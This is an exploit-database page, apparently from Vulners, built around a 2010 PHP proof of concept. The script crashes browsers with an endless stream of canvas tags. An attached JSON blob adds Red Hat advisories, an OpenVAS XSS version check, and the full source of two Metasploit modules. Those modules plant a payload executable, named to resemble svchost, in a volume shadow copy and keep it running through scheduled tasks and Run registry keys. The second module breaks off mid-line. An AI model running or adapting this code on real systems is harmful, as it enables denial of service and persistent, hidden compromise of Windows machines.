Search...

Canvas tag DoS - Multiple Browsers

2010-04-27T00:00:00

ID 1337DAY-ID-12022
Type zdt
Reporter Jelmer de Hen
Modified 2010-04-27T00:00:00

Description

Exploit for multiple platform in category dos / poc

                                        
                                            ==================================
Canvas tag DoS - Multiple Browsers
==================================

&lt;?php
# Canvas tag DoS Internet Explorer 6.0 & 8.0
#
# Found by Jelmer de Hen
# published at http://h.ackack.net/?p=269
# tested on: Windows XP SP3
# Internet Explorer 6.0 & 8.0, Opera 10.52, Chrome 4.1, Firefox 3.6.3, Safari 4.0.5
 
echo "&lt;html&gt;&lt;body&gt;";
while (1){
    echo "&lt;canvas&gt;";
}
echo "&lt;/body&gt;";
echo "&lt;/html&gt;";
?&gt;



#  0day.today [2018-04-11]  #

JSON Vulners Source

Initial Source

{"published": "2010-04-27T00:00:00", "id": "1337DAY-ID-12022", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T02:01:52", "bulletin": {"published": "2010-04-27T00:00:00", "id": "1337DAY-ID-12022", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 3.3, "modified": "2016-04-20T02:01:52", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "hash": "25a20051dfc0292ac8cfe12fa702ef263581dd5822a80323c3a6209fddf90ee7", "description": "Exploit for multiple platform in category dos / poc", "type": "zdt", "lastseen": "2016-04-20T02:01:52", "edition": 1, "title": "Canvas tag DoS - Multiple Browsers", "href": "http://0day.today/exploit/description/12022", "modified": "2010-04-27T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/12022", "references": [], "reporter": "Jelmer de Hen", "sourceData": "==================================\r\nCanvas tag DoS - Multiple Browsers\r\n==================================\r\n\r\n<?php\r\n# Canvas tag DoS Internet Explorer 6.0 & 8.0\r\n#\r\n# Found by Jelmer de Hen\r\n# published at http://h.ackack.net/?p=269\r\n# tested on: Windows XP SP3\r\n# Internet Explorer 6.0 & 8.0, Opera 10.52, Chrome 4.1, Firefox 3.6.3, Safari 4.0.5\r\n \r\necho \"<html><body>\";\r\nwhile (1){\r\n echo \"<canvas>\";\r\n}\r\necho \"</body>\";\r\necho \"</html>\";\r\n?>\r\n\r\n\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "7935825c7ededc2be15fe326826edd9b", "key": "sourceData"}, {"hash": "72229e38f198f643e691a98abf330d39", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "72229e38f198f643e691a98abf330d39", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "780f4f075f70fe41898cb17a089c04ba", "key": "sourceHref"}, {"hash": "ada50b6101c3a2c02b36202c81fba645", "key": "href"}, {"hash": "3ba4d423031dbdfcb1515c08f281fec4", "key": "title"}, {"hash": "eefcc58795c571457b35b97664b6d330", "key": "reporter"}, {"hash": "cdc2aa401057df1e80c0829fd5fd09a7", "key": "description"}], "objectVersion": "1.0"}}], "description": "Exploit for multiple platform in category dos / poc", "hash": "a9ffa4e932235355b48e1314906c824a26e824f3ed1d305a88fdf26356d2f53c", "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2018-04-11T19:45:50"}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:AUXILIARY/SQLI/ORACLE/DBMS_METADATA_GET_XML", "MSF:AUXILIARY/SQLI/ORACLE/DBMS_METADATA_GET_GRANTED_XML", "MSF:AUXILIARY/SQLI/ORACLE/DBMS_METADATA_OPEN"]}, {"type": "zdt", "idList": ["1337DAY-ID-6796"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:12022", "SECURITYVULNS:VULN:5956"]}], "modified": "2018-04-11T19:45:50"}, "vulnersScore": -0.2}, "type": "zdt", "lastseen": "2018-04-11T19:45:50", "edition": 2, "title": "Canvas tag DoS - Multiple Browsers", "href": "https://0day.today/exploit/description/12022", "modified": "2010-04-27T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "https://0day.today/exploit/12022", "references": [], "reporter": "Jelmer de Hen", "sourceData": "==================================\r\nCanvas tag DoS - Multiple Browsers\r\n==================================\r\n\r\n<?php\r\n# Canvas tag DoS Internet Explorer 6.0 & 8.0\r\n#\r\n# Found by Jelmer de Hen\r\n# published at http://h.ackack.net/?p=269\r\n# tested on: Windows XP SP3\r\n# Internet Explorer 6.0 & 8.0, Opera 10.52, Chrome 4.1, Firefox 3.6.3, Safari 4.0.5\r\n \r\necho \"<html><body>\";\r\nwhile (1){\r\n echo \"<canvas>\";\r\n}\r\necho \"</body>\";\r\necho \"</html>\";\r\n?>\r\n\r\n\n\n# 0day.today [2018-04-11] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "cdc2aa401057df1e80c0829fd5fd09a7", "key": "description"}, {"hash": "0b488eed5d172dc41e63a6752113a59f", "key": "href"}, {"hash": "72229e38f198f643e691a98abf330d39", "key": "modified"}, {"hash": "72229e38f198f643e691a98abf330d39", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "eefcc58795c571457b35b97664b6d330", "key": "reporter"}, {"hash": "6c0ee1b33a975e3f1466d30005539e02", "key": "sourceData"}, {"hash": "70372f8ee759a8b993df6f6471998f92", "key": "sourceHref"}, {"hash": "3ba4d423031dbdfcb1515c08f281fec4", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"redhat": [{"lastseen": "2019-07-22T16:50:26", "bulletinFamily": "unix", "description": "Red Hat Process Automation Manager is an open source business process management suite that combines process management and decision service management and enables business and IT users to create, manage, validate, and deploy process applications and decision services.\n\nThis release of Red Hat Process Automation Manager 7.4.0 serves as an update to Red Hat Process Automation Manager 7.3.1, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* jackson-databind: Potential information exfiltration with default typing, serialization gadget from MyBatis (CVE-2018-11307)\n\n* jackson-databind: improper polymorphic deserialization of types from Jodd-db library (CVE-2018-12022)\n\n* jackson-databind: improper polymorphic deserialization of types from Oracle JDBC driver (CVE-2018-12023)\n\n* jackson-databind: arbitrary code execution in slf4j-ext class (CVE-2018-14718)\n\n* jackson-databind: arbitrary code execution in blaze-ds-opt and blaze-ds-core classes (CVE-2018-14719)\n\n* jackson-databind: improper polymorphic deserialization in axis2-transport-jms class (CVE-2018-19360)\n\n* jackson-databind: improper polymorphic deserialization in openjpa class (CVE-2018-19361)\n\n* jackson-databind: improper polymorphic deserialization in jboss-common-core class (CVE-2018-19362)\n\n* jackson-databind: exfiltration/XXE in some JDK classes (CVE-2018-14720)\n\n* jackson-databind: server-side request forgery (SSRF) in axis2-jaxws class (CVE-2018-14721)\n\n* xstream: remote code execution due to insecure XML deserialization (CVE-2019-10173, regression of CVE-2013-7285)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-07-22T18:52:34", "published": "2019-07-22T18:52:01", "id": "RHSA-2019:1823", "href": "https://access.redhat.com/errata/RHSA-2019:1823", "type": "redhat", "title": "(RHSA-2019:1823) Important: Red Hat Process Automation Manager 7.4.0 Security Update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-22T16:51:54", "bulletinFamily": "unix", "description": "Red Hat Decision Manager is an open source decision management platform that combines business rules management, complex event processing, Decision Model & Notation (DMN) execution, and Business Optimizer for solving planning problems. It automates business decisions and makes that logic available to the entire business. \n\nThis release of Red Hat Decision Manager 7.4.0 serves as an update to Red Hat Decision Manager 7.3.1, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* jackson-databind: Potential information exfiltration with default typing, serialization gadget from MyBatis (CVE-2018-11307)\n\n* jackson-databind: improper polymorphic deserialization of types from Jodd-db library (CVE-2018-12022)\n\n* jackson-databind: improper polymorphic deserialization of types from Oracle JDBC driver (CVE-2018-12023)\n\n* jackson-databind: arbitrary code execution in slf4j-ext class (CVE-2018-14718)\n\n* jackson-databind: arbitrary code execution in blaze-ds-opt and blaze-ds-core classes (CVE-2018-14719)\n\n* jackson-databind: improper polymorphic deserialization in axis2-transport-jms class (CVE-2018-19360)\n\n* jackson-databind: improper polymorphic deserialization in openjpa class (CVE-2018-19361)\n\n* jackson-databind: improper polymorphic deserialization in jboss-common-core class (CVE-2018-19362)\n\n* jackson-databind: exfiltration/XXE in some JDK classes (CVE-2018-14720)\n\n* jackson-databind: server-side request forgery (SSRF) in axis2-jaxws class (CVE-2018-14721)\n\n* xstream: remote code execution due to insecure XML deserialization (CVE-2019-10173, regression of CVE-2013-7285)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-07-22T18:52:26", "published": "2019-07-22T18:51:53", "id": "RHSA-2019:1822", "href": "https://access.redhat.com/errata/RHSA-2019:1822", "type": "redhat", "title": "(RHSA-2019:1822) Important: Red Hat Decision Manager 7.4.0 Security Update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-10-09T14:48:57", "bulletinFamily": "scanner", "description": "CMS Made Simple is prone to multiple cross-site scripting (XSS) vulnerabilities.", "modified": "2019-10-07T00:00:00", "published": "2019-04-29T00:00:00", "id": "OPENVAS:1361412562310113380", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113380", "title": "CMS Made Simple <= 2.2.10 Reflected Multiple Cross-Site Scripting (XSS) Vulnerabilities", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113380\");\n script_version(\"2019-10-07T14:34:48+0000\");\n script_tag(name:\"last_modification\", value:\"2019-10-07 14:34:48 +0000 (Mon, 07 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-04-29 12:27:28 +0000 (Mon, 29 Apr 2019)\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"NoneAvailable\");\n\n script_cve_id(\"CVE-2019-11513\", \"CVE-2019-11226\", \"CVE-2019-10105\", \"CVE-2019-10106\",\n \"CVE-2019-10107\", \"CVE-2019-10017\");\n\n script_name(\"CMS Made Simple <= 2.2.10 Reflected Multiple Cross-Site Scripting (XSS) Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"cms_made_simple_detect.nasl\");\n script_mandatory_keys(\"cmsmadesimple/installed\");\n\n script_tag(name:\"summary\", value:\"CMS Made Simple is prone to multiple cross-site scripting (XSS) vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The following vulnerabilities exist:\n\n - The File Manager is prone to reflected XSS via the 'New Name' field in a Rename action.\n\n - XSS Vulnerability via the m1_name parameter in 'Add Article' under Content->Content Manager->News.\n\n - Self-XSS Vulnerability via the Layout Design Manager 'Name' field, which is reachable via a\n 'Create a new Template' action to the Designer.\n\n - XSS Vulnerability via the moduleinterface.php 'Name' field, which is reachable via an\n 'Add Category' action to the 'Site Admin Settings - News module' section.\n\n - XSS Vulnerability via the myaccount.php 'Email Address' field, which is reachable via the\n 'My Preferences - My Account' section.\n\n - XSS Vulnerability via the moduleinterface.php Name field, which is reachable via an\n 'Add a new Profile' action to the File Picker.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation would allow an authenticated attacker to inject arbitrary\n JavaScript and HTML into the site.\");\n\n script_tag(name:\"affected\", value:\"CMS Made Simple through version 2.2.10.\");\n\n script_tag(name:\"solution\", value:\"No known solution is available as of 17th June, 2019.\n Information regarding this issue will be updated once solution details are available.\");\n\n script_xref(name:\"URL\", value:\"http://dev.cmsmadesimple.org/bug/view/12022\");\n script_xref(name:\"URL\", value:\"http://dev.cmsmadesimple.org/bug/view/12001\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/153071/CMS-Made-Simple-2.2.10-Cross-Site-Scripting.html\");\n script_xref(name:\"URL\", value:\"https://ctrsec.io/index.php/2019/03/24/cmsmadesimple-xss-filepicker/\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:cmsmadesimple:cms_made_simple\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! version = get_app_version( cpe: CPE, port: port ) ) exit( 0 );\n\nif( version_is_less_equal( version: version, test_version: \"2.2.10\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"None Available\" );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "metasploit": [{"lastseen": "2019-11-24T02:44:15", "bulletinFamily": "exploit", "description": "This module will attempt to create a persistent payload in a new volume shadow copy. This is based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. This module has been tested successfully on Windows 7. In order to achieve persistence through the RUNKEY option, the user should need password in order to start session on the target machine.\n", "modified": "2017-07-24T13:26:21", "published": "2013-10-15T16:11:04", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/VSS_PERSISTENCE", "href": "", "type": "metasploit", "title": "Persistent Payload in Windows Volume Shadow Copy", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/exe'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::ShadowCopy\n include Msf::Post::Windows::Registry\n include Msf::Exploit::EXE\n\n def initialize(info={})\n\n super(update_info(info,\n 'Name' => \"Persistent Payload in Windows Volume Shadow Copy\",\n 'Description' => %q{\n This module will attempt to create a persistent payload in a new volume shadow copy. This is\n based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. This module has\n been tested successfully on Windows 7. In order to achieve persistence through the RUNKEY\n option, the user should need password in order to start session on the target machine.\n },\n 'Author' => ['Jedediah Rodriguez <Jedi.rodriguez[at]gmail.com>'], # @MrXors\n 'License' => MSF_LICENSE,\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter'],\n 'Targets' => [ [ 'Windows 7', {} ] ],\n 'DefaultTarget' => 0,\n 'References' => [\n [ 'URL', 'http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html' ],\n [ 'URL', 'http://www.irongeek.com/i.php?page=videos/hack3rcon2/tim-tomes-and-mark-baggett-lurking-in-the-shadows']\n ],\n 'DisclosureDate'=> \"Oct 21 2011\"\n ))\n\n register_options(\n [\n OptString.new('VOLUME', [ true, 'Volume to make a copy of.', 'C:\\\\']),\n OptBool.new('EXECUTE', [ true, 'Run the EXE on the remote system.', true]),\n OptBool.new('SCHTASK', [ true, 'Create a Scheduled Task for the EXE.', false]),\n OptBool.new('RUNKEY', [ true, 'Create AutoRun Key for the EXE', false]),\n OptInt.new('DELAY', [ true, 'Delay in Minutes for Reconnect attempt. Needs SCHTASK set to true to work. Default delay is 1 minute.', 1]),\n OptString.new('RPATH', [ false, 'Path on remote system to place Executable. Example: \\\\\\\\Windows\\\\\\\\Temp (DO NOT USE C:\\\\ in your RPATH!)', ]),\n ])\n\n end\n\n def exploit\n @clean_up = \"\"\n\n print_status(\"Checking requirements...\")\n\n os = sysinfo['OS']\n unless os =~ /Windows 7/\n print_warning(\"This module has been tested only on Windows 7\")\n end\n\n unless is_admin?\n print_error(\"This module requires admin privs to run\")\n return\n end\n\n unless is_high_integrity?\n print_error(\"This module requires UAC to be bypassed first\")\n return\n end\n\n print_status(\"Starting Volume Shadow Service...\")\n unless start_vss\n print_error(\"Unable to start the Volume Shadow Service\")\n return\n end\n\n print_status(\"Uploading payload...\")\n remote_file = upload(datastore['RPATH'])\n\n print_status(\"Creating Shadow Volume Copy...\")\n unless volume_shadow_copy\n fail_with(Failure::Unknown, \"Failed to create a new shadow copy\")\n end\n\n print_status(\"Finding the Shadow Copy Volume...\")\n volume_data_id = []\n cmd = \"cmd.exe /c vssadmin List Shadows| find \\\"Shadow Copy Volume\\\"\"\n output = cmd_exec(cmd)\n output.each_line do |line|\n cmd_regex = /HarddiskVolumeShadowCopy\\d{1,9}/.match(\"#{line}\")\n volume_data_id = \"#{cmd_regex}\"\n end\n\n print_status(\"Deleting malware...\")\n file_rm(remote_file)\n\n if datastore[\"EXECUTE\"]\n print_status(\"Executing #{remote_file}...\")\n execute(volume_data_id, remote_file)\n end\n\n if datastore[\"SCHTASK\"]\n print_status(\"Creating Scheduled Task...\")\n schtasks(volume_data_id, remote_file)\n end\n\n if datastore[\"RUNKEY\"]\n print_status(\"Installing as autorun in the registry...\")\n install_registry(volume_data_id, remote_file)\n end\n\n unless @clean_up.empty?\n log_file\n end\n end\n\n def upload(trg_loc=\"\")\n if trg_loc.nil? or trg_loc.empty?\n location = \"\\\\Windows\\\\Temp\"\n else\n location = trg_loc\n end\n\n file_name = \"svhost#{rand(100)}.exe\"\n file_on_target = \"#{location}\\\\#{file_name}\"\n\n exe = generate_payload_exe\n\n begin\n write_file(\"#{file_on_target}\", exe)\n rescue ::Rex::Post::Meterpreter::RequestError => e\n fail_with(Failure::NotFound, e.message)\n end\n\n return file_on_target\n end\n\n def volume_shadow_copy\n begin\n id = create_shadowcopy(datastore['VOLUME'])\n rescue ::Rex::Post::Meterpreter::RequestError => e\n fail_with(Failure::NotFound, e.message)\n end\n\n if id\n return true\n else\n return false\n end\n end\n\n def execute(volume_id, exe_path)\n run_cmd = \"cmd.exe /c %SYSTEMROOT%\\\\system32\\\\wbem\\\\wmic.exe process call create \\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\#{volume_id}\\\\#{exe_path}\"\n cmd_exec(run_cmd)\n end\n\n def schtasks(volume_id, exe_path)\n sch_name = Rex::Text.rand_text_alpha(rand(8)+8)\n global_root = \"\\\"\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\#{volume_id}\\\\#{exe_path}\\\"\"\n sch_cmd = \"cmd.exe /c %SYSTEMROOT%\\\\system32\\\\schtasks.exe /create /sc minute /mo #{datastore[\"DELAY\"]} /tn \\\"#{sch_name}\\\" /tr #{global_root}\"\n cmd_exec(sch_cmd)\n @clean_up << \"execute -H -f cmd.exe -a \\\"/c schtasks.exe /delete /tn #{sch_name} /f\\\"\\n\"\n end\n\n def install_registry(volume_id, exe_path)\n global_root = \"cmd.exe /c %SYSTEMROOT%\\\\system32\\\\wbem\\\\wmic.exe process call create \\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\#{volume_id}\\\\#{exe_path}\"\n nam = Rex::Text.rand_text_alpha(rand(8)+8)\n hklm_key = \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\"\n print_status(\"Installing into autorun as #{hklm_key}\\\\#{nam}\")\n res = registry_setvaldata(\"#{hklm_key}\", nam, \"#{global_root}\", \"REG_SZ\")\n if res\n print_good(\"Installed into autorun as #{hklm_key}\\\\#{nam}\")\n @clean_up << \"reg deleteval -k HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run -v #{nam}\\n\"\n else\n print_error(\"Error: failed to open the registry key for writing\")\n end\n end\n\n def clean_data\n host = session.sys.config.sysinfo[\"Computer\"]\n filenameinfo = \"_\" + ::Time.now.strftime(\"%Y%m%d.%M%S\")\n logs = ::File.join(Msf::Config.log_directory, 'persistence', Rex::FileUtils.clean_path(host + filenameinfo) )\n ::FileUtils.mkdir_p(logs)\n logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + \".rc\"\n return logfile\n end\n\n def log_file\n clean_rc = clean_data()\n file_local_write(clean_rc, @clean_up)\n print_status(\"Cleanup Meterpreter RC File: #{clean_rc}\")\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/vss_persistence.rb"}, {"lastseen": "2019-11-28T01:09:10", "bulletinFamily": "exploit", "description": "This module will install a payload that is executed during boot. It will be executed either at user logon or system startup via the registry value in \"CurrentVersion\\Run\" (depending on privilege and selected method).\n", "modified": "2017-07-24T13:26:21", "published": "2013-02-07T23:11:44", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/PERSISTENCE", "href": "", "type": "metasploit", "title": "Windows Persistent Registry Startup Payload Installer", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/post/common'\nrequire 'msf/core/post/file'\nrequire 'msf/core/post/windows/priv'\nrequire 'msf/core/post/windows/registry'\nrequire 'msf/core/exploit/exe'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::Common\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Registry\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Windows Persistent Registry Startup Payload Installer',\n 'Description' => %q{\n This module will install a payload that is executed during boot.\n It will be executed either at user logon or system startup via the registry\n value in \"CurrentVersion\\Run\" (depending on privilege and selected method).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Carlos Perez <carlos_perez[at]darkoperator.com>',\n 'g0tmi1k' # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features\n ],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ],\n 'Targets' => [ [ 'Windows', {} ] ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => \"Oct 19 2011\",\n 'DefaultOptions' =>\n {\n 'DisablePayloadHandler' => 'true'\n }\n ))\n\n register_options([\n OptInt.new('DELAY',\n [true, 'Delay (in seconds) for persistent payload to keep reconnecting back.', 10]),\n OptEnum.new('STARTUP',\n [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]),\n OptString.new('VBS_NAME',\n [false, 'The filename to use for the VBS persistent script on the target host (%RAND% by default).', nil]),\n OptString.new('EXE_NAME',\n [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),\n OptString.new('REG_NAME',\n [false, 'The name to call registry value for persistence on target host (%RAND% by default).', nil]),\n OptString.new('PATH',\n [false, 'Path to write payload (%TEMP% by default).', nil])\n ])\n\n register_advanced_options([\n OptBool.new('HANDLER',\n [false, 'Start an exploit/multi/handler job to receive the connection', false]),\n OptBool.new('EXEC_AFTER',\n [false, 'Execute persistent script after installing.', false])\n ])\n end\n\n # Exploit method for when exploit command is issued\n def exploit\n # Define default values\n rvbs_name = datastore['VBS_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))\n rexe_name = datastore['EXE_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))\n reg_val = datastore['REG_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))\n startup = datastore['STARTUP'].downcase\n delay = datastore['DELAY']\n exec_after = datastore['EXEC_AFTER']\n handler = datastore['HANDLER']\n @clean_up_rc = \"\"\n\n rvbs_name = rvbs_name + '.vbs' if rvbs_name[-4,4] != '.vbs'\n rexe_name = rexe_name + '.exe' if rexe_name[-4,4] != '.exe'\n\n # Connect to the session\n begin\n host = session.session_host\n print_status(\"Running persistent module against #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}\")\n rescue => e\n print_error(\"Could not connect to session: #{e}\")\n return nil\n end\n\n # Check values\n if is_system? && startup == 'user'\n print_warning('Note: Current user is SYSTEM & STARTUP == USER. This user may not login often!')\n end\n\n if handler && !datastore['DisablePayloadHandler']\n # DisablePayloadHandler will stop listening after the script finishes - we want a job so it continues afterwards!\n print_warning(\"Note: HANDLER == TRUE && DisablePayloadHandler == TRUE. This will create issues...\")\n print_warning(\"Disabling HANDLER...\")\n handler = false\n end\n\n # Generate the exe payload\n vprint_status(\"Generating EXE payload (#{rexe_name})\")\n exe = generate_payload_exe\n # Generate the vbs payload\n vprint_status(\"Generating VBS persistent script (#{rvbs_name})\")\n vbsscript = ::Msf::Util::EXE.to_exe_vbs(exe, {:persist => true, :delay => delay, :exe_filename => rexe_name})\n # Writing the payload to target\n vprint_status(\"Writing payload inside the VBS script on the target\")\n script_on_target = write_script_to_target(vbsscript, rvbs_name)\n # Exit the module because we failed to write the file on the target host\n # Feedback has already been given to the user, via the function.\n return unless script_on_target\n\n # Initial execution of persistent script\n case startup\n when 'user'\n # If we could not write the entry in the registy we exit the module.\n return unless write_to_reg(\"HKCU\", script_on_target, reg_val)\n vprint_status(\"Payload will execute when USER (#{session.sys.config.getuid}) next logs on\")\n when 'system'\n # If we could not write the entry in the registy we exit the module.\n return unless write_to_reg(\"HKLM\", script_on_target, reg_val)\n vprint_status(\"Payload will execute at the next SYSTEM startup\")\n else\n print_error(\"Something went wrong. Invalid STARTUP method: #{startup}\")\n return nil\n end\n\n # Do we setup a exploit/multi/handler job?\n if handler\n listener_job_id = create_multihandler(datastore['LHOST'], datastore['LPORT'], datastore['PAYLOAD'])\n if listener_job_id.blank?\n print_error(\"Failed to start exploit/multi/handler on #{datastore['LPORT']}, it may be in use by another process.\")\n end\n end\n\n # Do we execute the VBS script afterwards?\n target_exec(script_on_target) if exec_after\n\n # Create 'clean up' resource file\n clean_rc = log_file()\n file_local_write(clean_rc, @clean_up_rc)\n print_status(\"Clean up Meterpreter RC file: #{clean_rc}\")\n\n report_note(:host => host,\n :type => \"host.persistance.cleanup\",\n :data => {\n :local_id => session.sid,\n :stype => session.type,\n :desc => session.info,\n :platform => session.platform,\n :via_payload => session.via_payload,\n :via_exploit => session.via_exploit,\n :created_at => Time.now.utc,\n :commands => @clean_up_rc\n }\n )\n end\n\n # Writes script to target host and returns the pathname of the target file or nil if the\n # file could not be written.\n def write_script_to_target(vbs, name)\n filename = name || Rex::Text.rand_text_alpha((rand(8)+6)) + \".vbs\"\n temppath = datastore['PATH'] || session.sys.config.getenv('TEMP')\n filepath = temppath + \"\\\\\" + filename\n\n unless directory?(temppath)\n print_error(\"#{temppath} does not exists on the target\")\n return nil\n end\n\n if file?(filepath)\n print_warning(\"#{filepath} already exists on the target. Deleting...\")\n begin\n file_rm(filepath)\n print_good(\"Deleted #{filepath}\")\n rescue\n print_error(\"Unable to delete file!\")\n return nil\n end\n end\n\n begin\n write_file(filepath, vbs)\n print_good(\"Persistent VBS script written on #{sysinfo['Computer']} to #{filepath}\")\n\n # Escape windows pathname separators.\n @clean_up_rc << \"rm #{filepath.gsub(/\\\\/, '//')}\\n\"\n rescue\n print_error(\"Could not write the payload on the target\")\n # Return nil since we could not write the file on the target\n filepath = nil\n end\n\n filepath\n end\n\n # Installs payload in to the registry HKLM or HKCU\n def write_to_reg(key, script_on_target, registry_value)\n regsuccess = true\n nam = registry_value || Rex::Text.rand_text_alpha(rand(8)+8)\n key_path = \"#{key.to_s}\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\"\n\n print_status(\"Installing as #{key_path}\\\\#{nam}\")\n\n if key && registry_setvaldata(key_path, nam, script_on_target, \"REG_SZ\")\n print_good(\"Installed autorun on #{sysinfo['Computer']} as #{key_path}\\\\#{nam}\")\n else\n print_error(\"Failed to make entry in the registry for persistence\")\n regsuccess = false\n end\n\n regsuccess\n end\n\n # Executes script on target and returns true if it was successfully started\n def target_exec(script_on_target)\n execsuccess = true\n print_status(\"Executing script #{script_on_target}\")\n # Lets give the target a few seconds to catch up...\n Rex.sleep(3)\n\n # Error handling for process.execute() can throw a RequestError in send_request.\n begin\n unless datastore['EXE::Custom']\n cmd_exec(\"wscript \\\"#{script_on_target}\\\"\")\n else\n cmd_exec(\"cscript \\\"#{script_on_target}\\\"\")\n end\n rescue\n print_error(\"Failed to execute payload on target\")\n execsuccess = false\n end\n\n execsuccess\n end\n\n # Starts a exploit/multi/handler session\n def create_multihandler(lhost, lport, payload_name)\n pay = client.framework.payloads.create(payload_name)\n pay.datastore['LHOST'] = lhost\n pay.datastore['LPORT'] = lport\n print_status('Starting exploit/multi/handler')\n\n unless check_for_listener(lhost, lport)\n # Set 